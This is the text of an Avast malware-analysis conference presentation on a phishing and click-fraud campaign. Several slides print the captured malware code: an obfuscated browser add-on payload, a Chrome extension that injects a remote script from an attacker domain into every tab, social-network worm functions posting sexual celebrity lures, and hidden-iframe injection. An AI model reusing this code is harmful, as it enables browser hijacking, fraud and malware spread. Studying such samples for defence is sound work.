SlideShare a Scribd company logo
Every Click Counts (But All the Money Goes to Me)
Every Click Counts
(But All the Money Goes to Me)
Lukáš Hasík
Jan Širmer
Agenda
• Simple way to steal credentials
• Click for me
• Executable clicker
• Data from AVAST CommunityIQ userbase
• Summary
• Questions
Simple way to steal credentials
Simple way to steal credentials
credentials
Simple way to steal credentials
Simple way to steal credentials
User feels confident – s/he received a confirmation
Simple way to steal credentials
And some users really provided they real credentials…
Click for me
Executable clicker
Click for me
Flash player warning
Software Installation
Payloads
Payload in IE
Payloads for FF and Chrome
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){
whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}
('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ;
2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25||
2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25||
2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")=="")
{2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65))
{2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71''80&68'24&76`74}5", 17,8)}},64:9(){36
10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="")
{2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101;
102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26)
{63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28
103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15)
{34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26)
{15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)|
0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15)
{39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));
Unpacked dean
Change setting in browser
TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9
TestAddon.ch default string
TestAddon.date user set string 1340624313
TestAddon.guid user set string 3c94f90903f031a799162872a55742e8
TestAddon.int user set string 60
TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5
j.php content
function updated(tabId, changeInfo, tab){ if(changeInfo.status
== 'complete'){ chrome.tabs.executeScript(tabId,
{code:"if(window==window.top){var
h=document.getElementsByTagName('head')[0];var
s=document.createElement('script');s.type='text/javascript';s.sr
c='http://uhnm6.me/EDITED.php?
v=0.05a';h.appendChild(s);}"}, null); } }
chrome.tabs.onUpdated.addListener(updated);
chrome.tabs.getAllInWindow(null,function(tabs){ for(var i=0;i <
tabs.length;i++){ chrome.tabs.executeScript(tabs[i].id,
{code:"if(window==window.top){var
h=document.getElementsByTagName('head')[0];var
s=document.createElement('script');s.type='text/javascript';s.sr
c='http://uhnm76.me/EDITED.php?
v=0.05a';h.appendChild(s);}"}, null); } });
js_f.php
• Two different ways
1. Spreading malware to other people and works as a clicker
2. Only clicker
Spreading malware
• Script updates the victim’s Facebook and twitter status by
posting new status messages
Spreading malware
var videos = new Array(10);
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating
on hidden camera", "It happened in United Stateshotel",
"http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "",
"20", "friend", "327065014030715", "431402153539537",
"AQBu92VH5GDqrJkp", "2309869772");
var flk = Array();
if ((1 == 1)) {
var randomnumber = Math.floor(Math.random() * 100);
if (randomnumber > 0) {
Spreading malware
var uri = "http://tol.co/5q";
if ((document.location.href.search("tagged.com") > -1)) {
var ids = get_friends_t(1);
if (ids.length > 0) {
for (var i in ids) {
send_msg(uri, ids[i], "2222")
}
} else {
post_item("LOL Miley Cyrus got caught having s3x
" + uri, "2222")
}
}
Functionality
function likepage(pageid) {
var likepost = "fbpage_id=" + pageid +
"&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet
_header&post_form_id=" + fid + "&fb_dtsg=" + fbdt +
"&lsd&post_form_id_source=AsyncRequest";
var likepage = new XMLHttpRequest();
likepage.open("POST", "/ajax/pages/fan_status.php?
__a=1");
likepage.send(likepost)
}
Functionality
function get_online_friends(limit) {
var friends = get_friends(limit);
var friends = make_array(friends);
friends.sort();
var postfields = "user=" + uid;
for (var i = 0; i < friends.length; i++) {
postfields += "&available_user_info_ids[" + i + "]=" +
friends[i]
}
Functionality
function get_solved_captcha(extra_challenge_params, opt)
{
var output = new Array(3);
var post = new XMLHttpRequest();
post.open("GET",
"http://mp56a.com/fn/cs/api/s_c.php?u=" +
escape(extra_challenge_params), false);
post.send();
if (post.readyState == 4 && post.status == 200) {
data = eval('(' + post.responseText + ')');
console.log(data);
post[1] = data.key;
post[2] = data.challenge
}
Create injected iframe
function createIframe(src) {
var ifr = document.createElement("iframe");
ifr.setAttribute("src", src);
ifr.style.position = "absolute";
ifr.style.top = "0";
ifr.style.left = "0";
ifr.style.width = "100%";
ifr.style.height = "100%";
document.body.appendChild(ifr)
}
function get_img_src(src, no) {
x = src.getElementsByTagName("img");
return x[no].id
}
function make_dom(src) {
var tempDiv = document.createElement("div");
tempDiv.innerHTML = src;
return tempDiv
}
Clicker
• BHO, Firefox and Chrome payloads contain link to site like
http://resultsz.com/search/anticheat6.php?username=foreste
• There is hosted list of sites used by all of those “clickers” for
injecting hidden iframe with every visited site and earning
money to the blackhat.
Summary
• Be aware of social engineering
– Even simple attempts can be successful
• Social networks are used for spreading malware
– More user == more efficiency
• Trendy topics, celebrities and latest news are often start
point for these infection vectors
Questions and Answers
Thank you
Jan Sirmer (sirmer@avast.com)
Senior Virus Analyst
Lukas Hasik (hasik@avast.com)
QA Director

More Related Content

What's hot (20)

The Ring programming language version 1.8 book - Part 49 of 202
The Ring programming language version 1.8 book - Part 49 of 202The Ring programming language version 1.8 book - Part 49 of 202
The Ring programming language version 1.8 book - Part 49 of 202
Mahmoud Samir Fayed
 
Mongo db 101 dc group
Mongo db 101 dc groupMongo db 101 dc group
Mongo db 101 dc group
John Ragan
 
Mongo db presentation
Mongo db presentationMongo db presentation
Mongo db presentation
Julie Sommerville
 
The Ring programming language version 1.5.2 book - Part 42 of 181
The Ring programming language version 1.5.2 book - Part 42 of 181The Ring programming language version 1.5.2 book - Part 42 of 181
The Ring programming language version 1.5.2 book - Part 42 of 181
Mahmoud Samir Fayed
 
The Testing Games: Mocking, yay!
The Testing Games: Mocking, yay!The Testing Games: Mocking, yay!
The Testing Games: Mocking, yay!
Donny Wals
 
MySQL 8.0 Preview: What Is Coming?
MySQL 8.0 Preview: What Is Coming?MySQL 8.0 Preview: What Is Coming?
MySQL 8.0 Preview: What Is Coming?
Gabriela Ferrara
 
MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2
MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2
MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2
MongoDB
 
Back to Basics: My First MongoDB Application
Back to Basics: My First MongoDB ApplicationBack to Basics: My First MongoDB Application
Back to Basics: My First MongoDB Application
MongoDB
 
Back to Basics Webinar 5: Introduction to the Aggregation Framework
Back to Basics Webinar 5: Introduction to the Aggregation FrameworkBack to Basics Webinar 5: Introduction to the Aggregation Framework
Back to Basics Webinar 5: Introduction to the Aggregation Framework
MongoDB
 
Mongo db modifiers
Mongo db modifiersMongo db modifiers
Mongo db modifiers
zarigatongy
 
Schema design
Schema designSchema design
Schema design
christkv
 
First app online conf
First app   online confFirst app   online conf
First app online conf
MongoDB
 
San Francisco Java User Group
San Francisco Java User GroupSan Francisco Java User Group
San Francisco Java User Group
kchodorow
 
MongoDB - Introduction
MongoDB - IntroductionMongoDB - Introduction
MongoDB - Introduction
Vagmi Mudumbai
 
MongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDB
MongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDBMongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDB
MongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDB
MongoDB
 
Basic crud operation
Basic crud operationBasic crud operation
Basic crud operation
zarigatongy
 
Round pegs and square holes
Round pegs and square holesRound pegs and square holes
Round pegs and square holes
Daniel Greenfeld
 
The Ring programming language version 1.5.1 book - Part 42 of 180
The Ring programming language version 1.5.1 book - Part 42 of 180The Ring programming language version 1.5.1 book - Part 42 of 180
The Ring programming language version 1.5.1 book - Part 42 of 180
Mahmoud Samir Fayed
 
Юрий Буянов «Squeryl — ORM с человеческим лицом»
Юрий Буянов «Squeryl — ORM с человеческим лицом»Юрий Буянов «Squeryl — ORM с человеческим лицом»
Юрий Буянов «Squeryl — ORM с человеческим лицом»
e-Legion
 
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB
 
The Ring programming language version 1.8 book - Part 49 of 202
The Ring programming language version 1.8 book - Part 49 of 202The Ring programming language version 1.8 book - Part 49 of 202
The Ring programming language version 1.8 book - Part 49 of 202
Mahmoud Samir Fayed
 
Mongo db 101 dc group
Mongo db 101 dc groupMongo db 101 dc group
Mongo db 101 dc group
John Ragan
 
The Ring programming language version 1.5.2 book - Part 42 of 181
The Ring programming language version 1.5.2 book - Part 42 of 181The Ring programming language version 1.5.2 book - Part 42 of 181
The Ring programming language version 1.5.2 book - Part 42 of 181
Mahmoud Samir Fayed
 
The Testing Games: Mocking, yay!
The Testing Games: Mocking, yay!The Testing Games: Mocking, yay!
The Testing Games: Mocking, yay!
Donny Wals
 
MySQL 8.0 Preview: What Is Coming?
MySQL 8.0 Preview: What Is Coming?MySQL 8.0 Preview: What Is Coming?
MySQL 8.0 Preview: What Is Coming?
Gabriela Ferrara
 
MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2
MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2
MongoDB .local Chicago 2019: Using Client Side Encryption in MongoDB 4.2
MongoDB
 
Back to Basics: My First MongoDB Application
Back to Basics: My First MongoDB ApplicationBack to Basics: My First MongoDB Application
Back to Basics: My First MongoDB Application
MongoDB
 
Back to Basics Webinar 5: Introduction to the Aggregation Framework
Back to Basics Webinar 5: Introduction to the Aggregation FrameworkBack to Basics Webinar 5: Introduction to the Aggregation Framework
Back to Basics Webinar 5: Introduction to the Aggregation Framework
MongoDB
 
Mongo db modifiers
Mongo db modifiersMongo db modifiers
Mongo db modifiers
zarigatongy
 
Schema design
Schema designSchema design
Schema design
christkv
 
First app online conf
First app   online confFirst app   online conf
First app online conf
MongoDB
 
San Francisco Java User Group
San Francisco Java User GroupSan Francisco Java User Group
San Francisco Java User Group
kchodorow
 
MongoDB - Introduction
MongoDB - IntroductionMongoDB - Introduction
MongoDB - Introduction
Vagmi Mudumbai
 
MongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDB
MongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDBMongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDB
MongoDB World 2019: Tips and Tricks++ for Querying and Indexing MongoDB
MongoDB
 
Basic crud operation
Basic crud operationBasic crud operation
Basic crud operation
zarigatongy
 
Round pegs and square holes
Round pegs and square holesRound pegs and square holes
Round pegs and square holes
Daniel Greenfeld
 
The Ring programming language version 1.5.1 book - Part 42 of 180
The Ring programming language version 1.5.1 book - Part 42 of 180The Ring programming language version 1.5.1 book - Part 42 of 180
The Ring programming language version 1.5.1 book - Part 42 of 180
Mahmoud Samir Fayed
 
Юрий Буянов «Squeryl — ORM с человеческим лицом»
Юрий Буянов «Squeryl — ORM с человеческим лицом»Юрий Буянов «Squeryl — ORM с человеческим лицом»
Юрий Буянов «Squeryl — ORM с человеческим лицом»
e-Legion
 
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB
 

Similar to Every Click Counts (But All the Money Goes to Me) (20)

Create online games with node.js and socket.io
Create online games with node.js and socket.ioCreate online games with node.js and socket.io
Create online games with node.js and socket.io
grrd01
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
Justin Cataldo
 
How I Learned to Stop Worrying and Love jQuery (Jan 2013)
How I Learned to Stop Worrying and Love jQuery (Jan 2013)How I Learned to Stop Worrying and Love jQuery (Jan 2013)
How I Learned to Stop Worrying and Love jQuery (Jan 2013)
David Giard
 
SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"
SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"
SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"
South Tyrol Free Software Conference
 
asyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgf
asyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgfasyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgf
asyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgf
zmulani8
 
前端MVC之BackboneJS
前端MVC之BackboneJS前端MVC之BackboneJS
前端MVC之BackboneJS
Zhang Xiaoxue
 
Extjs + Gears
Extjs + GearsExtjs + Gears
Extjs + Gears
hagino 3000
 
HTML5 after the hype - JFokus2015
HTML5 after the hype - JFokus2015HTML5 after the hype - JFokus2015
HTML5 after the hype - JFokus2015
Christian Heilmann
 
Evolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB StitchEvolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB Stitch
MongoDB
 
Take Data Validation Seriously - Paul Milham, WildWorks
Take Data Validation Seriously - Paul Milham, WildWorksTake Data Validation Seriously - Paul Milham, WildWorks
Take Data Validation Seriously - Paul Milham, WildWorks
NodejsFoundation
 
Browsers with Wings
Browsers with WingsBrowsers with Wings
Browsers with Wings
Remy Sharp
 
Performance patterns
Performance patternsPerformance patterns
Performance patterns
Stoyan Stefanov
 
Doctype htm1
Doctype htm1Doctype htm1
Doctype htm1
Eddy_TKJ
 
Security Bootcamp 2013 lap trinh web an toan
Security Bootcamp 2013   lap trinh web an toanSecurity Bootcamp 2013   lap trinh web an toan
Security Bootcamp 2013 lap trinh web an toan
Security Bootcamp
 
Security Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp 2013 - Lap trinh web an toanSecurity Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp
 
Cnam azure 2014 mobile services
Cnam azure 2014   mobile servicesCnam azure 2014   mobile services
Cnam azure 2014 mobile services
Aymeric Weinbach
 
GraphQL - when REST API is not enough - lessons learned
GraphQL - when REST API is not enough - lessons learnedGraphQL - when REST API is not enough - lessons learned
GraphQL - when REST API is not enough - lessons learned
MarcinStachniuk
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
ÇözümPARK
 
Rushed to Victory Gardens' stage, An Issue of Blood is more effusion than play
Rushed to Victory Gardens' stage, An Issue of Blood is more effusion than playRushed to Victory Gardens' stage, An Issue of Blood is more effusion than play
Rushed to Victory Gardens' stage, An Issue of Blood is more effusion than play
chicagonewsyesterday
 
前端MVC 豆瓣说
前端MVC 豆瓣说前端MVC 豆瓣说
前端MVC 豆瓣说
Ting Lv
 
Create online games with node.js and socket.io
Create online games with node.js and socket.ioCreate online games with node.js and socket.io
Create online games with node.js and socket.io
grrd01
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
Justin Cataldo
 
How I Learned to Stop Worrying and Love jQuery (Jan 2013)
How I Learned to Stop Worrying and Love jQuery (Jan 2013)How I Learned to Stop Worrying and Love jQuery (Jan 2013)
How I Learned to Stop Worrying and Love jQuery (Jan 2013)
David Giard
 
SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"
SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"
SFScon17 - Patrick Puecher: "Exploring data with Elasticsearch and Kibana"
South Tyrol Free Software Conference
 
asyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgf
asyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgfasyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgf
asyncjavascript.pptxdgdsgdffgfdgfgfgfdgfdgf
zmulani8
 
前端MVC之BackboneJS
前端MVC之BackboneJS前端MVC之BackboneJS
前端MVC之BackboneJS
Zhang Xiaoxue
 
HTML5 after the hype - JFokus2015
HTML5 after the hype - JFokus2015HTML5 after the hype - JFokus2015
HTML5 after the hype - JFokus2015
Christian Heilmann
 
Evolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB StitchEvolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB Stitch
MongoDB
 
Take Data Validation Seriously - Paul Milham, WildWorks
Take Data Validation Seriously - Paul Milham, WildWorksTake Data Validation Seriously - Paul Milham, WildWorks
Take Data Validation Seriously - Paul Milham, WildWorks
NodejsFoundation
 
Browsers with Wings
Browsers with WingsBrowsers with Wings
Browsers with Wings
Remy Sharp
 
Doctype htm1
Doctype htm1Doctype htm1
Doctype htm1
Eddy_TKJ
 
Security Bootcamp 2013 lap trinh web an toan
Security Bootcamp 2013   lap trinh web an toanSecurity Bootcamp 2013   lap trinh web an toan
Security Bootcamp 2013 lap trinh web an toan
Security Bootcamp
 
Security Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp 2013 - Lap trinh web an toanSecurity Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp 2013 - Lap trinh web an toan
Security Bootcamp
 
Cnam azure 2014 mobile services
Cnam azure 2014   mobile servicesCnam azure 2014   mobile services
Cnam azure 2014 mobile services
Aymeric Weinbach
 
GraphQL - when REST API is not enough - lessons learned
GraphQL - when REST API is not enough - lessons learnedGraphQL - when REST API is not enough - lessons learned
GraphQL - when REST API is not enough - lessons learned
MarcinStachniuk
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
ÇözümPARK
 
Rushed to Victory Gardens' stage, An Issue of Blood is more effusion than play
Rushed to Victory Gardens' stage, An Issue of Blood is more effusion than playRushed to Victory Gardens' stage, An Issue of Blood is more effusion than play
Rushed to Victory Gardens' stage, An Issue of Blood is more effusion than play
chicagonewsyesterday
 
前端MVC 豆瓣说
前端MVC 豆瓣说前端MVC 豆瓣说
前端MVC 豆瓣说
Ting Lv
 

More from Avast (7)

Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
Avast
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
Avast
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
Avast
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
Avast
 
Where There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based ThreatsWhere There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based Threats
Avast
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
Avast
 
Google-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malwareGoogle-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malware
Avast
 
Home Security Map of the World
Home Security Map of the World Home Security Map of the World
Home Security Map of the World
Avast
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
Avast
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
Avast
 
Avast Q1 Security Report 2015
Avast Q1 Security Report 2015Avast Q1 Security Report 2015
Avast Q1 Security Report 2015
Avast
 
Where There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based ThreatsWhere There's Money, There's Crime: Web-based Threats
Where There's Money, There's Crime: Web-based Threats
Avast
 
Korean Banks Under Pressure
Korean Banks Under PressureKorean Banks Under Pressure
Korean Banks Under Pressure
Avast
 
Google-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malwareGoogle-image poisoning: How hackers use images to spread malware
Google-image poisoning: How hackers use images to spread malware
Avast
 

Recently uploaded (19)

(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
Determining Glass is mechanical textile
Determining  Glass is mechanical textileDetermining  Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 
(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
Determining Glass is mechanical textile
Determining  Glass is mechanical textileDetermining  Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
